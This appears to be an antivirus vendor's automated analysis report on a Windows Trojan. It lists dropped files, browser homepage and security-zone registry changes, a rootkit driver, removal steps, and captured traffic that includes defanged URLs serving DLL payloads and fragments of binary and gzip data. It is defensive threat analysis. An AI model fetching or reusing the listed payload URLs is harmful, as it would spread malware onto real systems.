Gen.Variant.Symmi.63061_26b96d0c0c – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):

%original file name%.exe:1832

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1832 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\hTnANms\EArNsVa.dll (13719 bytes)
C:\nwfvJhr.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (1778 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (2562 bytes)
%WinDir%\clog.txt (5020 bytes)
%WinDir%\MpvlIklT.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (4954 bytes)
C:\gyVLeno.bat (18 bytes)
C:\JOedQmjW.dll (3481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\desktop.ini (67 bytes)
%System%\74ec9\CDClient_EX.sys (108 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (18 bytes)
C:\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (4199 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%System%\CDCLOG.txt (87 bytes)

The Trojan deletes the following file(s):

%WinDir%\hTnANms\EArNsVa.dll (0 bytes)
C:\nwfvJhr.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (0 bytes)
%WinDir%\MpvlIklT.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (0 bytes)
C:\gyVLeno.bat (0 bytes)
C:\JOedQmjW.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (0 bytes)
%System%\74ec9\CDClient_EX.sys (0 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (0 bytes)
C:\498E9.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (0 bytes)
%System%\CDCLOG.txt (0 bytes)

Registry activity

The process %original file name%.exe:1832 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"ImagePath" = "\DosDevices\%System%\74ec9\CDClient_EX.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"ErrorControl" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 7A 33 6D D8 F2 22 FB 9C D4 9D 17 00 60 4B 85"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Devname" = "R65SdhOzV1G"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Start" = "3"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
a7593f0cb215231cd18877d846efeb59	c:\JOedQmjW.dll
9cd1bda903fa3c1447b98a6cc7b5a19d	c:\WINDOWS\hTnANms\EArNsVa.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan controls creation and closing of processes by installing the process notifier.

Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan controls operations with a system registry by installing the registry notifier.

The Trojan installs the following kernel-mode hooks:

ZwTerminateProcess

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\hTnANms\EArNsVa.dll (13719 bytes)
C:\nwfvJhr.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (1778 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (2562 bytes)
%WinDir%\clog.txt (5020 bytes)
%WinDir%\MpvlIklT.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (4954 bytes)
C:\gyVLeno.bat (18 bytes)
C:\JOedQmjW.dll (3481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\desktop.ini (67 bytes)
%System%\74ec9\CDClient_EX.sys (108 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (18 bytes)
C:\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (4199 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%System%\CDCLOG.txt (87 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	286720	112128	5.54409	9fa1ced2e0c24dca8d57485477d272da
DATA	290816	724992	720384	5.5448	aa17a4970f6c4c80efb06e2e9a813f98
BSS	1015808	4096	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	1019904	8192	2048	5.03807	508e5b72d32a7f60ba2dc42f1968f594
.tls	1028096	4096	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	1032192	4096	512	0.146134	1cd25dfa02f8cf7ef11eda7171df941f
.reloc	1036288	24576	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	1060864	20480	5120	4.80478	265b1cc001f314ba9cf6fd5e3a29b90b
.aspack	1081344	12288	9216	4.2544	88fe2fdbebfd3fad67f8a505549c3c47
.adata	1093632	4096	0	0	d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://www.58sky.com/index/getcfg?id=1	119.97.143.41
hxxp://opt.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://opt.ecoma.ourwebpic.com/
hxxp://opt.ecoma.ourwebpic.com/d2/x86.dll
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://175.haodns123.cc/
hxxp://175.haodns123.cc/css/style.css
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js
hxxp://opt.ecoma.ourwebpic.com/ips1388.asp
hxxp://www.58sky.com/index/eventup.html	119.97.143.41
hxxp://so.qh-lb.com/
hxxp://www.haosou.com/	125.88.193.243
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js	183.60.200.84
hxxp://www.ip138.com/	87.245.198.83
hxxp://www.go890.com/d2/CDClient.dll	87.245.198.83
hxxp://www.ip138.com/ips1388.asp	87.245.198.83
hxxp://cnwb.58ad.cn/index/eventup.html	119.97.143.22
hxxp://www.go890.com/d2/x86.dll	87.245.198.83
hxxp://www.175sf.com/	183.60.200.84
hxxp://1212.ip138.com/ic.asp	42.236.95.18
hxxp://www.175sf.com/css/style.css	183.60.200.84
www.so.com	106.120.160.134

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /css/style.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.175sf.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 02 Sep 2016 17:46:34 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Last-Modified: Thu, 23 Jun 2016 10:01:38 GMT

Content-Encoding: gzip

b2a...............n......?..,.....(KZ.....Q.2.J...A...5%...^;.c..T....~@..gZ.y./....sf..(.:....`9.s.s...~.G....7...f.g.x52.g..,]..M|....^. ...]...x^..F.<...o.?Z.... {f.2NnG...}......'.....#.,:.../G.'&...;9.z.9:>._.LN..#c..".:^...-H.0.:y..l..$.W..,./r.\..y.TL&.L.G..-..QF.O.$.(..$.h.f~...8.W..$f....|".8).5.....t...q~..}...Vg..uR:62.....4.w%._B...T...k?....}.....K.M.../.9....o............[........m..jI...a.(..8...n,.To...|F.....(.....I.. ....q&._L..l".'..j. .L-"..2k..sW8@:i.#..W.,-T...:K>.v?'_...}.K.y.}....b..>..Ig`.o........q5........r.w........1;@f}...].0....95...V..`..Q...3.......yH.'.c.NNN.%.t..U....{tK.h:"..1.,..c"`o.EA...r.x..z..1...=U....i%:.p.3..3.1.9..n_.......w.?.n....V... 4....FZ....*Q......r...].g.$.2QZm......g..0.2..k ..s nn.$...S..[..f. ...fi^.T...B..(.$T.3\^ R..wq.....llE}..P..e.W...%._..D...cc.$...R... ..fd,.0.V.......#..w.&.z.`..G] . C.....{.`...G..9....p...r.x.h..N(....:..f.\...@.7..).D..F`#.........f.p....2L.Z.......J.......M.`[...2ZE7.e.d.v..r.. .... .....djV..rZ...=.......d........o?....~...Q..h.......C".=v.o.K...0.~.C(.L...B.......>Z..y'......Q..I.....=Y.J....(^....Uu'...02....\S!..C...Z.... S.~.=\....z.....A.n......S..H.u).L.k.P...<Hb.Y....|u..N..8.....0.\'n......oC`...(....H.l..s....q.[7.`...1t....4.....X.us..~.1...Z.....e...-^t.;.d....3...}F.6......., SPu.V.....e......@...8.r..es.z...*m....5.*.2...h........R.%.^.Zc....4;.=.\.AS..OE..J.;.}.,..YE$.;k.........@]G.i..Ptq...;M...#V.AS.......>;.....-b;....YDH.W.#".@/.w.A......8.a..zH....,(.. `{..E.9...(."...v..F.xW...r...^..

<<< skipped >>>

GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.175sf.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 02 Sep 2016 17:46:35 GMT

Content-Type: application/x-javascript

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT

Content-Encoding: gzip

607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...>..._,..L.,.{....$r...2"...................o.-....E.\7...".........i.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1..........<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(......,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN..."<....OOq...U..XY.v.."..f.K..k...........B}.<?............`......`.9..Ho.....W.5&.w..A S~..........O..M....V....Z.....@.vQ.\..].\..#.,.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ......4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.mv...f5v...p.`....i..T......~..`0k..t...........5......S...`................t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h....q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U........@d.B...f\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3.4R. .c.&..]...o....T..... ..".8....p :.=.Z..b...@......O.f..:==Y...M....Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......

<<< skipped >>>

GET /ips1388.asp HTTP/1.1

Host: VVV.ip138.com

Accept: text/html, */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 200 OK

Date: Fri, 02 Sep 2016 17:46:54 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 9659

Content-Type: text/html

Set-Cookie: ASPSESSIONIDQCQRSQRR=CNIHBEKENOHNABNJLBGEEHLA; path=/

Cache-Control: private

X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)

Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML>..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta http-equiv="mobile-agent" content="format=html5; url=hXXp://m.ip138.com/ip.html"/>..<TITLE>IP........--.................. | ............ | ............ | ........................</TITLE>..<META NAME="Generator" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Author" CONTENT="ip138,........">..<META NAME="Keywords" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Description" CONTENT="ip,IP....,IP........,ip138,........">..<SCRIPT LANGUAGE="JavaScript">..<!--..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(

<<< skipped >>>

GET /ic.asp HTTP/1.1

Host: 1212.ip138.com

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Server: Microsoft-IIS/6.0

Connection: keep-alive

Date: Fri, 02 Sep 2016 17:46:49 GMT

Content-Type: text/html

Content-Length: 219

X-Powered-By: ASP.NET

Set-Cookie: ASPSESSIONIDACRTTRAB=JJNGNJJCFAFFBPMOMMGPILNC; path=/

X-Daa-Tunnel: hop_count=1

<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>..

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.haosou.com

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Server: openresty

Date: Fri, 02 Sep 2016 17:46:55 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: hXXp://VVV.so.com/

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....

GET /d2/x86.dll HTTP/1.1

Host: VVV.go890.com

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Date: Fri, 02 Sep 2016 14:02:24 GMT

Server: kangle/2.9.6

Last-Modified: Tue, 30 Aug 2016 05:59:59 GMT

Content-Type: application/octet-stream

Content-Length: 196608

Age: 1

X-Via: 1.1 jfzh181:7 (Cdn Cache Server V2.0), 1.1 db78:1 (Cdn Cache Server V2.0)

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y...y..\yRich..\y........................PE..L......W...........!.........>.......@.......................................P............@..................................6..P.... .......................0..H....................................0..@...............@............................text............................... ..`.rdata..tM.......N..................@..@.data...l....@.......0..............@....rsrc........ ......................@..@.reloc..H....0......................@..B........................................................................................................................................................................................................................................................................................................................................U..j.hP1..h.i..d.....P...SVW..@..1E.3.P.E.d......e.3..u.d.0....E..u..E..x.......;.......f.y,.su.A0....nt...Nuf.P...tt...TuY.P...dt...DuL.P...lt...Lu?.P...lt...Lu2.x..u,.P...dt...Du..P...lt...Lu......<lt.<Lu..q......u..........e.3..u..E........M.d......Y_^[..].............U..j.hp1..h.i..d.....P...SVW..@..1E.3.P.E.d......e..E......MZ..f9.t..E.....2..M.d......Y_^[..]..A<...8PE..u............e.2..E..E......M.d......Y_^[..]..........U..j.h.1..h.i..d.....P...SVW..@..1E.3.P.E.d......e..E......u..I.N.u.

<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 02 Sep 2016 17:46:32 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Content-Location: hXXp://VVV.175sf.com/index.html

Last-Modified: Fri, 02 Sep 2016 14:14:48 GMT

Content-Encoding: gzip

3c74.............}.s[G...L...Xfg-.. .@.<......5;;...&.T...........l.d.U.a.RS......=8$.......x. .'%k$Y...,..4.h.R..\\.......@6.l.x........9}...?../>.....'..qR...7.....p.................o......\...z...6.uZ.fh.'.3..P..S...MOOs..\.~l....].{.pq..Ac..\.Q1p...;Uo...Fk8}.}..TJ]N}Y)S..I.Q..o.*....O.|....Z...g....9....Qy.8.W..#W........_@..8Cp....Q.).............E...i../..;...s...K...{~%.^t.....!..F...&O.Q7..ie....?S.L...C......7}..J.\...n9...Tsr...../..l... ..............R......s..[.w.OSK..I.R.o."S..s.k..dc........m.#2..4H.O9x^.W....7 .J..G.>.....D.j.Z;.Q...........8.Qr...8FRN..._........*......>....~.1..........:;~.......a..;..r..[..8.;/..y...u......)...;.......O...r...'......p.......~.$....?.... ..|....._Gt..x....].V....B.>..kd.r..uS...I......LP...>1@>.......O.Gh......Q...IR..i=...&-I\....;?.|..R H.(.....~B..MQ.5nK....qtP2@..1.g....:...Cr....T....2.\5$.R... .....&.".PJH..pX....wNr.....S..Qy....~.|}B......|.!9R.tZ...i.V...jt.y.@....F.....*.\....*.9?&ox...@..?.o.?6...../.9y..........dW......c:..0..2.._...*.T...>IL.~.:...F..h...nT.......'...VO....!.....9>..@..&T.o.O.l../......o.m.}..&M.7.w...2...Q....v...v..F.|.[}....).....[.....3..T.n.......8.Km.V......b!....-n.H..B..m..7......7.9.{)Z...q&xU........3Q8....nD.[o...P.V.3...J(~-.z...#..s....GgA...2.zL{z@N....|...Ipc&r....~.a%.O..s...p..L..8..`<..|B4.6.F4J..ZaT.. H.3..!m.......\....dr.vl...L.h.n.BOw.Q.w'B:p......%..K..i.(./....c/[\$..vQx1......~...k6nF..._...v.u....K_o..w8..../...... r..P.....k._.u.R...#....n.....*..!..G...E.cg.......}...jI....

<<< skipped >>>

GET /index/getcfg?id=1 HTTP/1.1

Host: VVV.58sky.com

Accept: text/html, */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Server: nginx/1.4.4

Date: Fri, 02 Sep 2016 17:46:36 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.27

Set-Cookie: PHPSESSID=98vb0q0l9p2151g3helo8edbb1; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Encoding: gzip

1000a..............w.$.q&.U.@../.f..E0...A.HH........f..LwO....=Y6s@..;...duuu......_..W....._~..ur........6...}.........q\.A...VQ[.~..}...z.........[...~.U.t...Q.I....../h9.....[...o..>..5..<.w......".Nvg..]....e{.........%..?*.7..Kq...-...E..sS...."..^ ..........1.?..nU.........S......;.W.6.v<.\.O.9...v...1.... ..uw....$...M.........w.....v..\..r...{....u....n.\......0..T.?.6@F......P.A..W.}. ......_V...B|.%........3.es8..u..].0..?..}...M..I_...~....&(................... 